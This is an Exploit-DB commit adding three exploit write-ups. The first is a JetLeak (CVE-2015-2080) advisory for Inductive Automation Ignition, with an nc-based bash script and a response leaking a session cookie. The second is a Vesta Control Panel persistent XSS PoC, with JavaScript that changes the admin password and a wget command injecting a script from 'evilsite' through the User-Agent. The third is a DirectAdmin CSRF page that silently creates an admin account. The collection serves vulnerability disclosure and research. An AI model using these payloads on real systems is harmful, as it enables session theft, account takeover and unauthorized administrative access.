From f48dc1ccea5c588a40e23826d1f5ac45ed565272 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 19 Feb 2016 05:01:53 +0000
Subject: [PATCH] DB: 2016-02-19

3 new exploits
---
 files.csv                           |   3 +
 platforms/multiple/remote/39455.txt | 150 ++++++++++++++++++++++++++++
 platforms/php/webapps/39468.txt     |  42 ++++++++
 platforms/php/webapps/39469.txt     |  54 ++++++++++
 4 files changed, 249 insertions(+)
 create mode 100755 platforms/multiple/remote/39455.txt
 create mode 100755 platforms/php/webapps/39468.txt
 create mode 100755 platforms/php/webapps/39469.txt

diff --git a/files.csv b/files.csv
index cf6cf6586..adae956a4 100755
--- a/files.csv
+++ b/files.csv
@@ -35514,6 +35514,7 @@ id,file,description,date,author,platform,type,port
 39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - CSRF Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent XSS Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
 39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - RFI / CSRF Vulnerability",2016-01-18,hyp3rlinx,php,webapps,80
+39455,platforms/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,multiple,remote,0
 39371,platforms/osx/dos/39371.c,"OS X - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0
 39372,platforms/osx/dos/39372.c,"OS X - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0
 39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443
@@ -35696,3 +35697,5 @@ id,file,description,date,author,platform,type,port
 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
 39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
 39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
+39468,platforms/php/webapps/39468.txt,"Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
+39469,platforms/php/webapps/39469.txt,"DirectAdmin 1.491 - CSRF Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
diff --git a/platforms/multiple/remote/39455.txt b/platforms/multiple/remote/39455.txt
new file mode 100755
index 000000000..c115a7ead
--- /dev/null
+++ b/platforms/multiple/remote/39455.txt
@@ -0,0 +1,150 @@
+Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers
+Vendor: Inductive Automation
+Product web page: http://www.inductiveautomation.com
+Affected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)
+Platform: Java
+
+Summary: Ignition is a powerful industrial application platform with
+fully integrated development tools for building SCADA, MES, and IIoT
+solutions.
+
+Desc: Remote unauthenticated atackers are able to read arbitrary data
+from other HTTP sessions because Ignition uses a vulnerable Jetty server.
+When the Jetty web server receives a HTTP request, the below code is used
+to parse through the HTTP headers and their associated values. The server
+begins by looping through each character for a given header value and checks
+the following:
+
+- On Line 1164, the server checks if the character is printable ASCII or
+not a valid ASCII character.
+- On Line 1172, the server checks if the character is a space or tab.
+- On Line 1175, the server checks if the character is a line feed.
+- If the character is non-printable ASCII (or less than 0x20), then all
+of the checks above are skipped over and the code throws an ëIllegalCharacterí
+exception on line 1186, passing in the illegal character and a shared buffer.
+
+
+---------------------------------------------------------------------------
+File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java
+---------------------------------------------------------------------------
+920: protected boolean parseHeaders(ByteBuffer buffer)
+921: {
+[..snip..]
+1163:     case HEADER_VALUE:
+1164:         if (ch>HttpTokens.SPACE || ch<0)
+1165:         {
+1166:             _string.append((char)(0xff&ch));
+1167:             _length=_string.length();
+1168:             setState(State.HEADER_IN_VALUE);
+1169:             break;
+1170:         }
+1171:
+1172:         if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)
+1173:            break;
+1174:
+1175:         if (ch==HttpTokens.LINE_FEED)
+1176:         {
+1177:             if (_length > 0)
+1178:             {
+1179:                 _value=null;
+1180:                 _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
+1181:             }
+1182:             setState(State.HEADER);
+1183:             break;
+1184:         }
+1185:
+1186:         throw new IllegalCharacter(ch,buffer);
+---------------------------------------------------------------------------
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+           Microsoft Windows 7 Ultimate SP1 (EN)
+           Ubuntu Linux 14.04
+           Mac OS X
+           HP-UX Itanium
+           Jetty(9.2.z-SNAPSHOT)
+           Java/1.8.0_73
+           Java/1.8.0_66
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5306
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
+
+CVE: CVE-2015-2080
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080
+
+Original: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
+Jetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py
+Eclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md
+         https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
+
+
+14.01.2016
+
+---
+
+
+#######################
+#!/bin/bash
+
+#RESOURCEPATH="/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo"
+RESOURCEPATH="/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo"
+BAD=$'\a'
+
+function normalRequest {
+echo "-- Normal Request --"
+
+nc localhost 8088 << NORMREQ
+POST $RESOURCEPATH HTTP/1.1
+Host: localhost
+Content-Type: application/x-www-form-urlencoded;charset=utf-8
+Connection: close
+Content-Length: 63
+
+NORMREQ
+}
+
+function badCookie {
+echo "-- Bad Cookie --"
+
+nc localhost 8088 << BADCOOKIE
+GET $RESOURCEPATH HTTP/1.1
+Host: localhost
+Coo${BAD}kie: ${BAD}
+
+BADCOOKIE
+}
+
+normalRequest
+echo ""
+echo ""
+badCookie
+
+#######################
+
+
+
+Original raw analysis request via proxy using Referer:
+------------------------------------------------------
+
+GET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1
+Host: localhost:8088
+Accept: application/xml, text/xml, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+Wicket-Ajax: true
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
+Wicket-Ajax-BaseURL: config/conf.modules?51461
+Referer: \x00
+
+
+Response leaking part of Cookie session:
+----------------------------------------
+
+HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1'
+Content-Length: 0
+Connection: close
+Server: Jetty(9.2.z-SNAPSHOT)
diff --git a/platforms/php/webapps/39468.txt b/platforms/php/webapps/39468.txt
new file mode 100755
index 000000000..f4e2f3369
--- /dev/null
+++ b/platforms/php/webapps/39468.txt
@@ -0,0 +1,42 @@
+# Exploit Title     :Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability
+# Vendor Homepage   :http://www.vestacp.com
+# Version           :0.9.8-15
+# Exploit Author    :Necmettin COSKUN @babayarisi 
+# Blog              :http://ha.cker.io
+# Discovery date    :16/02/2016
+# Tested on         :Fedora23 - Chrome/Firefox/Maxthon
+
+We can use user-agent information to attack website like this. 
+First of all we change our user-agent and add some dangerous javascript code ( XSS etc. ) 
+and then we request to one of the website on target server then it is saved on access.log by server 
+so when Administrator reads it the javascript code works that we added our user-agent information.
+
+Poc Exploit
+================
+1.Prepare evil js file 
+
+function csrfWithToken(url,hanimisToken,password){
+	$.get(url, function(gelen) {
+		$('body').append($(gelen));
+		$('form[id="vstobjects"]').css("display","none");
+		var token = $(hanimisToken).attr("token");
+		$('form[id="vstobjects"]').attr("action",url);
+		$('input[name="v_password"]').val(password);	
+		$('form[id="vstobjects"]').submit();		
+	});
+};
+//password = 1234567
+csrfWithToken("/edit/user/?user=admin","#token","123456");
+
+2. Make a Get request with evil user-agent to victim server
+ 
+wget --header="Accept: text/html" --user-agent="<script src='http://evilsite/evil.js'></script>" http://victimserver
+ 
+3. We wait Administrator to read access.log that injected our evil.js
+4. We log-in VestaCP via password we changed
+http(s)://victim:8083/
+  
+  
+Discovered by:
+================
+Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
\ No newline at end of file
diff --git a/platforms/php/webapps/39469.txt b/platforms/php/webapps/39469.txt
new file mode 100755
index 000000000..39e1d46fe
--- /dev/null
+++ b/platforms/php/webapps/39469.txt
@@ -0,0 +1,54 @@
+
+=============================================================================
+# Title   : DirectAdmin (1.491) CSRF Vulnerability 
+# Date    : 27-10-2014 updated 18-02-2016
+# Version : >=1.491 
+# Author  : Necmettin COSKUN =>@babayarisi
+# Blog    :http://ha.cker.io
+# Vendor  : http://www.directadmin.com/
+# Download: http://www.directadmin.com/demo.html
+=============================================================================
+# info : DirectAdmin is a web-based hosting control panel.
+
+#As you can see original form doesn't include csrf protection or any secret token.
+<form name=reseller action="CMD_ACCOUNT_ADMIN" method="post" onSubmit="return formOK()">
+<input type=hidden name=action value=create>
+<tr><td class=list>Username:</td><td class=list><input type=text name=username maxlength=12 onChange="checkName()"></td></tr>
+<tr><td class=list>E-Mail:</td><td class=list><input type=text name=email onChange="checkEmail()"></td></tr>
+<tr><td class=list>Enter Password:</td><td class=list><input type=password name=passwd> <input type=button value="Random" onClick="randomPass()"></td></tr>
+<tr><td class=list>Re-Enter Password:</td><td class=list><input type=password name=passwd2 onChange="checkPass()"></td></tr>
+<tr><td class=list>Send Email Notification:</td><td class=list><input type=checkbox value="yes" name=notify checked> <a href="javascript:showAdminMessage();">Edit Admin Message</a></td></tr>
+
+<tr><td td class=listtitle colspan=3 align=right>
+<input type=submit value="Submit">
+</td></tr>
+</form>
+
+#POC
+<html>
+<head>
+<title>POC</title>
+</head>
+<script language="javascript">
+
+function yurudi(){
+var adress  ="www.demo.com";
+var username="demo";
+var email   ="demo@demo.com";
+var password="12345";
+var urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action=create&username="+username+"&email="+email+"&passwd="+password+"&passwd2="+password;
+
+document.getElementById("resim").src=urlson;
+}
+</script>
+
+<body onload="yurudi()">
+<img id="resim" src="" style="height:0px;width:0px;"></img>
+</body>
+</html>
+#POC
+
+# don't be evil!
+Discovered by:
+================
+Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
\ No newline at end of file